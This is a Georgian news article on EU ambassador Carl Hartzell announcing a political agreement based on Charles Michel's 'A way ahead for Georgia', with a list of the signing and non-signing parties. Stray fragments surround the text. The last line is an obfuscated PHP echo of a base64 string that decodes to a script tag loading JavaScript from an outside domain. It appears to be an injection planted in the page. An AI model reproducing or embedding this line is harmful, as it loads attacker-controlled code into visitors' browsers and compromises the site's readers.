celsiusi
ავერსი საქკაბელი
ჩვენ შევძელით შეთანხმების მიღწევა - ჩემთვის ეს ემოციური მომენტიც არის, მჯერა, რომ შეთანხმება არის ახალი გზა საქართველოსთვის, - ამის შესახებ საქართველოში ევროკავშირის ელჩმა კარლ ჰარცელმა განაცხადა.
 
„ამ საღამოს ჩვენ შევძელით შეთანხმების მიღწევა მხარეებს შორის. დოკუმეტს ხელი შვიდმა პოლიტიკურმა პარტიამ მოაწერა. მასში მონაწილოებას 7 პოლიტიკური პარტია იღებდა. ამით მთავრდება პროცესი, რომელიც 6 თვის განმავლობაში მიმდინარეობდა. მე მისი ნაწილი დასწყისიდანვე ვიყავი. ფასილიტაციის 4 თვეს მოჰყვა ინტენსიური თანამშრომლობის 2 თვე. მე მადლიერი ვარ, რომ ამ პროცესების ნაწილი ვიყავი, იმის მიუხედავად, რომ ფიზიკურად ძალიან დამღლელი იყო. ჩემთვის ეს ემოციური მომენტიც არის. მჯერა, რომ ეს შეთანხმება არის ახალი გზა საქართველოსთვის. ჩვენ მივდივართ უფრო მტკიცე დემოკრატიის განმტკიცებისთვის და უფრო მტკიცე ევროკავშირი-საქართველოს პარტნიორობისკენ“, - განაცხადა ჰარცელმა.
 
ცნობისთვის, შარლ მიშელის დოკუმენტზე - „საქართველოს წინსვლის გზა“ ხელისუფლებასა და ოპოზიური პარტიების ნაწილს შორის შეთანხმება შედგა. დოკუმენტს ხელი რამდენიმე წუთის წინ, ორბელიანის სასახლეში მოეწერა.
 
კერძოდ, შეთანხმების ტექსტს ოპოზიციური სპექტრიდან ხელი მოაწერეს „სტრატეგია აღმაშენებლის“ თავმჯდომარე გიორგი ვაშაძემ, „ლელოს“ ლიდერებმა - ბადრი ჯაფარიძემ და მამუკა ხაზარაძემ, „რესპუბლიკური პარტიის“ თავმჯდომარე ხათუნა სამნიძემ, „მოქალაქეების“ თავმჯდომარე ალეკო ელისაშვილმა და „გირჩის“ ერთ-ერთმა ლიდერმა ვახტანგ მეგრელიშვილმა. ასევე დოკუმენტზე ინდივიდუალური ხელმოწერა დააფიქსირეს „ნაციონალური მოძრაობის“ ერთ-ერთმა ლიდერმა სალომე სამადაშვილმა, პარლამენტის დამოუკიდებელმა წევრმა დავით ბაქრაძემ და „გირჩი - მეტი თავისუფლებისთვის“ თავმჯდომარე ზურაბ ჯაფარიძემ.
 
დოკუმენტს ამ ეტაპზე არ შეერთებია „ნაციონალური მოძრაობა“ და „ევროპული საქართველო“, შესაბამისად, შეთანხმების ტექსტს არ აქვს მათი ხელმოწერა.
 
შარლ მიშელის დოკუმენტზე - „საქართველოს წინსვლის გზა“ თანხმობა დააფიქსირა „ქართულმა ოცნებამაც“.
1090
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");